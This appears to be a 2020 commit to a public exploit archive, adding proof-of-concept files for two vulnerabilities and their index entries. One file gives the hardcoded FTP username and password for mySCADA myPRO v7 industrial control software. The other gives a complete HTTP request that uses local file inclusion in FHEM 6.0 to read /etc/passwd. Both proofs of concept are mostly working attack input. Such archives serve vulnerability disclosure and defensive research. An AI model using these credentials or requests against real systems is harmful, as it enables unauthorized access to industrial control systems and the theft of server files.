DB: 2020-06-26

2 changes to exploits/shellcodes mySCADA myPRO 7 - Hardcoded Credentials FHEM 6.0 - Local File Inclusion
denisse-dev · Jun 26, 2020 · c22ad85 · c22ad85
1 parent e48d268
commit c22ad85
Show file tree

Hide file tree

Showing 3 changed files with 46 additions and 0 deletions.
diff --git a/exploits/hardware/remote/48620.txt b/exploits/hardware/remote/48620.txt
@@ -0,0 +1,18 @@
+# Exploit Title: mySCADA myPRO v7 Hardcoded Credentials
+# Date: 2018-07-02
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: http://myscada.org
+# Software Link: https://www.myscada.org/mypro/
+# Version: v7.0.45
+# Tested on: Windows/Linux
+# CVE-2018-11311
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
+# https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password
+
+# PoC
+
+ftp [IP] 2121
+
+username: myscada
+
+password: Vikuk63
diff --git a/exploits/php/webapps/48621.txt b/exploits/php/webapps/48621.txt
@@ -0,0 +1,26 @@
+# Exploit Title: FHEM 6.0 - Local File Inclusion
+# Date: 2020-02-10
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: https://fhem.de/
+# Software Link: https://fhem.de/#Download
+# Version: v6.0
+# Tested on: Windows
+# Link: https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
+
+# PoC
+
+To exploit vulnerability, someone could use 'http://
+[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text'
+request
+to get some informations from the target by changing "file" parameter.
+
+GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1
+Host: [TARGET]
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0)
+Gecko/20100101 Firefox/74.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -18201,6 +18201,7 @@ id,file,description,date,author,type,platform,port
 48540,exploits/linux/remote/48540.py,"vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-02,aaronsvk,remote,linux,
 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,
 48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,
+48620,exploits/hardware/remote/48620.txt,"mySCADA myPRO 7 - Hardcoded Credentials",2020-06-25,"Emre ÖVÜNÇ",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42876,3 +42877,4 @@ id,file,description,date,author,type,platform,port
 48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
 48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,
 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,
+48621,exploits/php/webapps/48621.txt,"FHEM 6.0 - Local File Inclusion",2020-06-25,"Emre ÖVÜNÇ",webapps,php,